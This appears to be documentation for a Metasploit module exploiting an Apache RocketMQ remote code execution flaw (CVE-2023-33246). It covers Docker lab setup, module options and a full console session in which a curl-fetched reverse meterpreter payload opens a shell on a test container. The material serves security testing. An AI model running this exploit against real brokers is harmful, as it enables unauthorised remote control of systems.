## Vulnerable Application

RocketMQ versions 5.1.0 and below are vulnerable to Arbitrary Code Injection. Broker component of RocketMQ is
leaked on the extranet and lack permission verification. An attacker can exploit this vulnerability by using
the update configuration function to execute commands as the system users that RocketMQ is running as.
Additionally, an attacker can achieve the same effect by forging the RocketMQ protocol content.

### Setup

#### Docker setup
Instructions taken from https://github.com/Malayke/CVE-2023-33246_RocketMQ_RCE_EXPLOIT

```
    docker pull apache/rocketmq:4.9.4
    # Start nameserver
    docker run --rm --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv
    # Start Broker
    docker run --rm --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf
```

## Verification Steps

1. Start msfconsole.
1. Do: ` use exploit/multi/http/apache_rocketmq_update_config`.
1. Set the `RHOST` and `LHOST` options.
1. Run the module.
1. Receive a session in the context of the user running the RocketMQ application.

## Options

### BROKER_PORT
The port the target RocketMQ Broker component is running on. If left unset the default port will be used if a Broker
port associated with the RHOST cannot be determined from querying the RocketMQ NameServer.

## Scenarios

### Docker container running RocketMQ 4.9.4, Target: Automatic (Unix In-Memory)

```
msf > use multi/http/apache_rocketmq_update_config
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/apache_rocketmq_update_config) > set rhosts 127.0.0.1
rhosts => 127.0.0.1
msf exploit(multi/http/apache_rocketmq_update_config) > set FETCH_SRVHOST 172.16.199.158
FETCH_SRVHOST => 172.16.199.158
msf exploit(multi/http/apache_rocketmq_update_config) > set lhost 172.16.199.158
lhost => 172.16.199.158
msf exploit(multi/http/apache_rocketmq_update_config) > options

Module options (exploit/multi/http/apache_rocketmq_update_config):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   BROKER_PORT  10911            no        The RocketMQ Broker port. If left unset the module will attempt to retrieve the Broker port from the
                                           NameServer response (recommended)
   RHOSTS       127.0.0.1        yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htm
                                           l
   RPORT        9876             yes       The RocketMQ NameServer port (TCP)
   SSL          false            no        Negotiate SSL for incoming connections
   SSLCert                       no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                       no        The URI to use for this exploit (default is random)


   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0
                                        to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      OAvAHUouS        no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       172.16.199.158   yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               172.16.199.158   yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Unix In-Memory)



View the full module info with the info, or info -d command.

msf exploit(multi/http/apache_rocketmq_update_config) > run

[*] Started reverse TCP handler on 172.16.199.158:4444
[*] 127.0.0.1:9876 - Running automatic check ("set AutoCheck false" to disable)
[+] 127.0.0.1:9876 - The target appears to be vulnerable. RocketMQ version: 4.9.4
[*] 127.0.0.1:9876 - autodetection failed, assuming default port of 10911
[*] 127.0.0.1:9876 - Executing target: Automatic (Unix In-Memory) with payload cmd/linux/http/x64/meterpreter/reverse_tcp on Broker port: 10911
[*] Sending stage (3045348 bytes) to 172.17.0.3
[*] 127.0.0.1:9876 - Removing the payload from where it was injected into $ROCKETMQ_HOME. The FilterServerManager class will execute the payload every 30 seconds until this is reverted
[+] 127.0.0.1:9876 - Determined the original $ROCKETMQ_HOME: /home/rocketmq/rocketmq-4.9.4
[*] 127.0.0.1:9876 - Re-running the exploit in order to reset the proper $ROCKETMQ_HOME value
[*] Meterpreter session 5 opened (172.16.199.158:4444 -> 172.17.0.3:35532) at 2023-07-04 11:26:58 -0700

meterpreter > getuid
Server username: rocketmq
meterpreter > sysinfo
Computer     : 172.17.0.3
OS           : CentOS 7.9.2009 (Linux 5.15.0-76-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

